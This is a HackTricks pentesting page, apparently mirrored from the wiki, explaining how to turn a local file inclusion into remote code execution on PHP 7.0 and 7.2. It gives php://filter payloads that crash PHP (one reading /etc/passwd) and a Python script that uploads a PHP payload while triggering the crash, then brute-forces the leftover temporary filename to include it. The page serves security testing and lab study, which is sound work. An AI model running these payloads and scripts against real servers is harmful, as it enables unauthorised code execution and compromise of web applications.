lfi2rce-via-segmentation-fault.md (3574B)
1 --- 2 title: "LFI2RCE via Segmentation Fault" 3 section: "Web Pentesting" 4 sectionSlug: "pentesting-web" 5 sourcePath: "src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # LFI2RCE via Segmentation Fault 14 15 The following `php://filter` payloads caused segmentation faults in the specific PHP 7.0 and 7.2 environments used by the original challenge writeups.<sup>[[1]](#references)[[2]](#references)</sup> 16 17 > [!NOTE] 18 > These are version-specific crashes, not reliable payloads for current PHP releases. Reproduce them only in a controlled environment that matches the affected build. 19 20 ```php 21 // PHP 7.0 22 include("php://filter/string.strip_tags/resource=/etc/passwd"); 23 24 // PHP 7.2 25 include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA"); 26 ``` 27 28 For a multipart POST upload, PHP stores the file in its configured upload temporary directory, or the system temporary directory when none is configured. Unless the application moves or renames it, PHP normally deletes the temporary file at the end of the request.<sup>[[3]](#references)</sup> 29 30 In the affected versions, crashing PHP during the upload can interrupt that cleanup and leave the temporary file behind. If a separate local file inclusion (LFI) vulnerability can include files from the temporary directory, an attacker can search for the generated name and include the uploaded PHP payload.<sup>[[1]](#references)[[2]](#references)</sup> 31 32 The archived `easyengine/php7.0` container can provide a PHP 7.0 test environment.<sup>[[4]](#references)</sup> 33 34 ```python 35 # Upload a file while triggering the segmentation fault. 36 import requests 37 url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd" 38 with open("la.php", "rb") as payload: 39 try: 40 requests.post(url, files={"file": payload}) 41 except requests.RequestException: 42 pass # The deliberately crashed worker may drop the connection. 43 44 # Search for a six-character PHP temporary-file suffix. 45 import itertools 46 import string 47 48 charset = string.ascii_letters + string.digits 49 base_url = "http://127.0.0.1:8008" 50 51 # This exhaustive 62^6 loop is intentionally simple and can take a very long time. 52 for chars in itertools.product(charset, repeat=6): 53 suffix = "".join(chars) 54 candidate = f"{base_url}/index.php?i=/tmp/php{suffix}" 55 response = requests.get(candidate, timeout=5) 56 if b"spyd3r" in response.content: 57 print(f"[+] Include succeeded: {candidate}") 58 break 59 ``` 60 61 The exhaustive example is useful for illustrating the filename search, but it is not operationally efficient. In a lab, constrain the candidate space with observed temporary-name behavior or use bounded concurrency without overwhelming the target. 62 63 ## References 64 65 - [1] [One Line PHP Challenge and the Return of One Line PHP Challenge writeup](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) 66 - [2] [PHP segmentation fault via php://filter chains (HackMD writeup)](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view) 67 - [3] [PHP manual: POST method uploads](https://www.php.net/manual/en/features.file-upload.post-method.php) 68 - [4] [Docker Hub: `easyengine/php7.0`](https://hub.docker.com/r/easyengine/php7.0)